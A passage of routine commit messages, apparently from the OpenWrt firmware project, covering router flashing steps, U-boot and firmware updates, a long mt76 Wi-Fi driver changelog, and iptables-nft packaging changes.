5. Please make backup of original partitions, if you think about revert
to stock.
6. Login via ssh or serial and remove stock partitions:
ubiattach -m 9
ubirmvol /dev/ubi0 -N ubi_rootfs
ubirmvol /dev/ubi0 -N ubi_rootfs_data
7. Install image via "sysupgrade -n".
Signed-off-by: Pawel Dembicki <paweldembicki@gmail.com>
(cosmetic changes to the commit message)
Signed-off-by: Christian Lamparter <chunkeey@gmail.com>
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Kalle Valo ath10k-firmware repository no longer provides the
legacy board.bin files for the qca99x0 chips. Instead he
copied over the codeaurora version and add more board files.
In the future, this board-2.bin should find its way to
linux-firmware.git, which would allow us to remove the
extra download code completely.
Signed-off-by: Christian Lamparter <chunkeey@gmail.com>
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this should have been removed together with linux 5.4 APM821XX
support. Currently, this didn't hurt or broke something. But it
will in the next stable kernel release.
Signed-off-by: Christian Lamparter <chunkeey@gmail.com>
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The SDK does not ship the generic platform files. Use relative path for
GENERIC_PLATFORM_DIR to make it work. This points it at the files from
the feed directory instead of the base SDK path
Signed-off-by: Felix Fietkau <nbd@nbd.name>
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All devices which used this package migrated to the kernel GPIO-line
watchdog driver and configure it over their DT.
Signed-off-by: Sven Eckelmann <sven@narfation.org>
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This solves issue with DDR training on Turris Omnia.
Log:
******** DRAM initialization Failed (res 0x1) ********
DDR3 Training Sequence - FAILED
ERROR ### Please RESET the board ###
Signed-off-by: Josef Schlehofer <pepe.schlehofer@gmail.com>
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* Add U-boot support for Turris Omnia
Signed-off-by: Josef Schlehofer <pepe.schlehofer@gmail.com>
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Signed-off-by: Josef Schlehofer <pepe.schlehofer@gmail.com>
Tested-by: Andre Heider <a.heider@gmail.com> # ESPRESSObin
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833b9d7fcf7f mt76: allow drivers to drop rx packets early
f703084f31cb mt76: mt7915: process txfree and txstatus without allocating skbs
047b9a9e78b3 mt76: mt7615: in debugfs queue stats, skip wmm index 3 on mt7663
fea36e02075c mt76: only kick tx queue if frames were queued
8381e54ebfb5 linux-firmware: update firmware for MT7921 WiFi device
d57dadb8c861 Revert "mt76: only kick tx queue if frames were queued"
3a21d6e2153b mt76: mt7663: disable 4addr capability
f1d66cf7a6c5 mt76: connac: fix possible NULL pointer dereference in mt76_connac_get_phy_mode_v2
c9a4146404d4 sync with upstream
4ed8c910b94e mt76: mt7921: fix possible resume failure
bf105aa6cd2f mt76: mt7921: fix network buffer leak by txs missing
e2b454b6fb30 mt76: connac: introduce MCU_EXT macros
5a87f5497c9b mt76: connac: align MCU_EXT definitions with 7915 driver
720ddc32507d mt76: connac: remove MCU_FW_PREFIX bit
da5128a59eda mt76: connac: introduce MCU_UNI_CMD macro
116109bee7cb mt76: connac: introduce MCU_CE_CMD macro
f96fbdf038d5 mt76: connac: rely on MCU_CMD macro
922f0d408413 mt76: mt7915: rely on mt76_connac definitions
b4ae1da1d1e0 mt76: mt7921: reduce log severity levels for informative messages
db105a722b87 mt76: mt7921s: make pm->suspended usage consistent
e2cc063238c0 mt76: mt7921s: fix suspend error with enlarging mcu timeout value
812b73f2f1e0 mt76: mt7915: introduce mt76_vif in mt7915_vif
b041a8a30055 mt76: mt7915: add mu-mimo and ofdma debugfs knobs
b851a3e7839d mt76: mt7921: remove dead definitions
266c7a9f2994 mt76: connac: rely on le16_add_cpu in mt76_connac_mcu_add_nested_tlv
19cc7d83190c mt76: mt7921: clear pm->suspended in mt7921_mac_reset_work
928c4550e413 mt76: mt7921s: make pm->suspended usage consistent [update]
8d6c68a7d0d1 mt76: mt7921: fix possible resume failure [update]
26fb105e538c mt76: mt7921s: fix cmd timeout in throughput test
9db482264389 mt76: mt7921: fix build regression
3edb87cdf138 mt7915: formatting change to sync with upstream
5cad38ba247d mt76: mt7915: add mt7915_mmio_probe() as a common probing function
15f9f88b362a mt76: mt7915: refine register definition
de49cf43ef34 mt76: add MT_RXQ_MAIN_WA for mt7916
6032c35f1306 mt76: mt7915: rework dma.c to adapt mt7916 changes
074d7c5381ed mt76: mt7915: add firmware support for mt7916
27b3253318e7 mt76: mt7915: rework eeprom.c to adapt mt7916 changes
030540246088 mt76: mt7915: enlarge wcid size to 544
400129c69f91 mt76: mt7915: add txfree event v3
cbbb3f65fcd0 mt76: mt7915: update rx rate reporting for mt7916
eb51c4deef0e mt76: mt7915: update mt7915_chan_mib_offs for mt7916
fb4709222028 mt76: mt7915: add mt7916 calibrated data support
e758feeaf1d6 mt76: mt7915: add device id for mt7916
115ea27a5cab mt76: connac: fix sta_rec_wtbl tag len
b3f922266685 mt76: mt7915: rely on mt76_connac_mcu_alloc_sta_req
bac5eda1f5b2 mt76: mt7915: rely on mt76_connac_mcu_alloc_wtbl_req
b44485d5c8ac mt76: mt7915: rely on mt76_connac_mcu_add_tlv routine
9cc58e254d53 mt76: connac: move mt76_connac_mcu_get_cipher in common code
60dcd9f09ff6 mt76: connac: move mt76_connac_chan_bw in common code
a8d0b7d0cc60 mt76: mt7915: rely on mt76_connac_get_phy utilities
4441db30c1c1 mt76: connac: move mt76_connac_mcu_add_key in connac module
794b6f18d0fb mt76: mt7915: fix code defect
9d2a01b6cb60 mt76: set wlan_idx_hi on mt7916
2c89977b32c2 mt76: mt7915: fix kernel build warning
6c4874839830 mt76: make mt76_sar_capa static
215fdcc7ca6c mt76: mt7915: use proper aid value in mt7915_mcu_wtbl_generic_tlv in sta mode
bc254718b40e mt76: mt7915: use proper aid value in mt7915_mcu_sta_basic_tlv
22fcff5ff21a mt76: sdio: lock sdio when it is needed
4669882aa595 mt76: mt7921s: clear MT76_STATE_MCU_RUNNING immediately after reset
944545855e0f mt76: mt7921s: update mt7921s_wfsys_reset sequence
854c8d076a34 mt76: mt7915: move pci specific code back to pci.c
a77da27796f2 mt76: mt7915: fix warning: variable 'base' is used uninitialized
7b5e69961c71 mt76: mt7915: fix warning: variable 'flags' set but not used
b5138e7b89f9 mt76: mt7921: fix a possible race enabling/disabling runtime-pm
af218fbe2500 linux-firmware: update firmware for MT7921 WiFi device
31c19c467950 mt76: mt7915: remove duplicated defs in mcu.h
9198eca1b16f mt76: connac: move mt76_connac_mcu_bss_omac_tlv in connac module
829d87a93a51 mt76: connac: move mt76_connac_mcu_bss_ext_tlv in connac module
50956cf17901 mt76: connac: move mt76_connac_mcu_bss_basic_tlv in connac module
bda40f4e1d5e mt76: mt7915: rely on mt76_connac_mcu_sta_ba_tlv
4728939c1d48 mt76: mt7915: rely on mt76_connac_mcu_wtbl_ba_tlv
e3ae1828068b mt76: mt7915: rely on mt76_connac_mcu_sta_ba
d9e9989eca07 mt76: mt7915: rely on mt76_connac_mcu_wtbl_generic_tlv
168713595fff mt76: mt7915: rely on mt76_connac_mcu_sta_basic_tlv
60394d3e3504 mt76: mt7915: rely on mt76_connac_mcu_sta_uapsd
3a79454d078d mt76: mt7915: rely on mt76_connac_mcu_wtbl_smps_tlv
9ae9aa6c1aea mt76: mt7915: rely on mt76_connac_mcu_wtbl_ht_tlv
fd8cdfab91e4 mt76: mt7915: rely on mt76_connac_mcu_wtbl_hdr_trans_tlv
a92024c5a5b5 mt76: connac: move mt76_connac_mcu_wtbl_update_hdr_trans in connac module
6dc585a3a274 mt76: connac: introduce is_connac_v1 utility routine
0f29d2aa5a72 mt76: connac: move mt76_connac_mcu_set_pm in connac module
dcf408ff8a5e mt76: mt7921: get rid of mt7921_mcu_get_eeprom
77b2a8601fc1 mt76: mt7915: rely on mt76_connac_mcu_start_firmware
65f78dee243a mt76: connac: move mt76_connac_mcu_restart in common module
5adf5b14040b mt76: mt7915: rely on mt76_connac_mcu_patch_sem_ctrl/mt76_connac_mcu_start_patch
69bf1dabe78f mt76: mt7915: rely on mt76_connac_mcu_init_download
951b1ddd370e mt76: connac: move mt76_connac_mcu_gen_dl_mode in mt76-connac module
0826b3992238 mt76: mt7915: rely on mt76_connac_mcu_set_rts_thresh
058de6d36fa9 mt76: connac: move mt76_connac_mcu_rdd_cmd in mt76-connac module
aafda86aed2b mt76: mt7921e: make dev->fw_assert usage consistent
def12bef91a3 mt76: mt7921: forbid the doze mode when coredump is in progress
009414d27d37 mt76: mt76_connac: fix MCU_CE_CMD_SET_ROC definition error
3c5856eca223 mt76: mt7921: set EDCA parameters with the MCU CE command
01a3d73b452e mt76: mt7615: fix a possible race enabling/disabling runtime-pm
123ed864d1ae mt76: mt7921e: process txfree and txstatus without allocating skbs
018f98abba68 mt76: connac: add support for passing the cipher field in bss_info
288e7443e35c mt76: mt7615: update bss_info with cipher after setting the group key
36e1577cb3d3 mt76: mt7915: update bss_info with cipher after setting the group key
d42590d8fcc8 mt76: make cipher in struct mt76_vif u8 instead of enum
11602b8505c6 mt76: mt7615e: process txfree and txstatus without allocating skbs
2ef775c10bd3 linux-firmware: add firmware for MT7916
976ea3879730 mt76: mt7915: add support for passing chip/firmware debug data to user space
d11bd7bd83f4 tools: add support for sending firmware debug data via udp
dc8e2e8dcd34 mt76: mt7921: do not always disable fw runtime-pm
7063127f852b mt76: mt7921: fix a leftover race in runtime-pm
f78f4334b0b2 mt76: mt7615: fix a leftover race in runtime-pm
f1f94d19c160 mt76: mt7915: fix ht mcs in mt7915_mac_add_txs_skb()
c2ff2f0d6d19 mt76: mt7921: fix ht mcs in mt7921_mac_add_txs_skb()
3e7954a0b32e mt76: mt7921s: fix mt7921s_mcu_[fw|drv]_pmctrl
3c2cc9034376 mt76: mt7921e: fix possible probe failure after reboot
f7f6c6dcc6eb mt76: mt7921: fix crash when startup fails.
8656198c925b mt76: sdio: disable interrupt in mt76s_sdio_irq
6204d61ab821 mt76: mt7921: fix endianness issues in mt7921_mcu_set_tx()
68c5aa56f5f2 mt76: mt7921: toggle runtime-pm adding a monitor vif
541e4e8d3c3e mt76: mt7915: set bssinfo/starec command when adding interface
78770f741af9 mt76: mt7915: introduce mt7915_set_radar_background routine
93c03778f92e mt76: mt7915: enable radar trigger on rdd2
4c76a6c3a1f2 mt76: mt7915: introduce rdd_monitor debugfs node
5b94045f927e mt76: mt7915: report radar pattern if detected by rdd2
22094b27ff6a mt76: mt7915: enable radar background detection
4282ca57a143 mt76: connac: move mt76_connac_lmac_mapping in mt76-connac module
0f16c67657a2 mt76: mt7915: add missing DATA4_TB_SPTL_REUSE1 to mt7915_mac_decode_he_radiotap
9a16d33311a7 mt76: mt7921: remove duplicated code in mt7921_mac_decode_he_radiotap
639b55fdc95e mt76: mt7615: add support for LG LGSBWAC02 (MT7663BUN)
ebbd2717a16e mt76: mt7663s: flush runtime-pm queue after waking up the device
37c3bf2256de mt76: mt7603: check sta_rates pointer in mt7603_sta_rate_tbl_update
96959bd15eef mt76: mt7615: check sta_rates pointer in mt7615_sta_rate_tbl_update
4e42e55ce636 mt76: stop the radar detector after leaving dfs channel
8b32439d5a86 mt76: mt7915: fix possible memory leak in mt7915_mcu_add_sta
b4e6f0d6f15a mt76: mt7921s: fix a possible memory leak in mt7921_load_patch
15398f1e8385 mt76: mt7915: fix mcs_map in mt7915_mcu_set_sta_he_mcs()
607eda6eb032 mt76: mt7915: update max_mpdu_size in mt7915_mcu_sta_amsdu_tlv()
69d20f2e6cb0 mt76: mt7915: fix the nss setting in bitrates
c3ffa536249a mt76: sdio: honor the largest Tx buffer the hardware can support
e3e3562f8fa0 mt76: mt7921s: run sleep mode by default
553200cf63fd firmware: update mt7662 firmware to version 2.3
20d1fed838b9 mt76x02: improve mac error check/reset reliability
9b2ac62d6f31 mt76: mt76x02: improve tx hang detection
fae295af31eb mt76: mt7915: fix/rewrite the dfs state handling logic
e0f9479bf893 mt76: mt7615: fix/rewrite the dfs state handling logic
822e1135e7e1 mt76: mt76x02: use mt76_phy_dfs_state to determine radar detector state
f8c0ed1e6bdf mt76: do not always copy ethhdr in reverse_frag0_hdr_trans
ab9b8078427a mt76: dma: initialize skip_unmap in mt76_dma_rx_fill
Signed-off-by: Felix Fietkau <nbd@nbd.name>
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Will be used in an upcoming mt76 update
Signed-off-by: Felix Fietkau <nbd@nbd.name>
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Signed-off-by: Felix Fietkau <nbd@nbd.name>
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Signed-off-by: Felix Fietkau <nbd@nbd.name>
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Will be used in an upcoming mt76 update
Signed-off-by: Felix Fietkau <nbd@nbd.name>
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Now that we can have both legacy and nft iptables variants
installed at the same time, install the legacy symlinks
Signed-off-by: Etienne Champetier <champetier.etienne@gmail.com>
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As nftables is now the default, ip(6)tables-nft gets higher priority
The removed symlinks ("$(CP)" line) will now be installed by the
ALTERNATIVES mechanism
Signed-off-by: Etienne Champetier <champetier.etienne@gmail.com>
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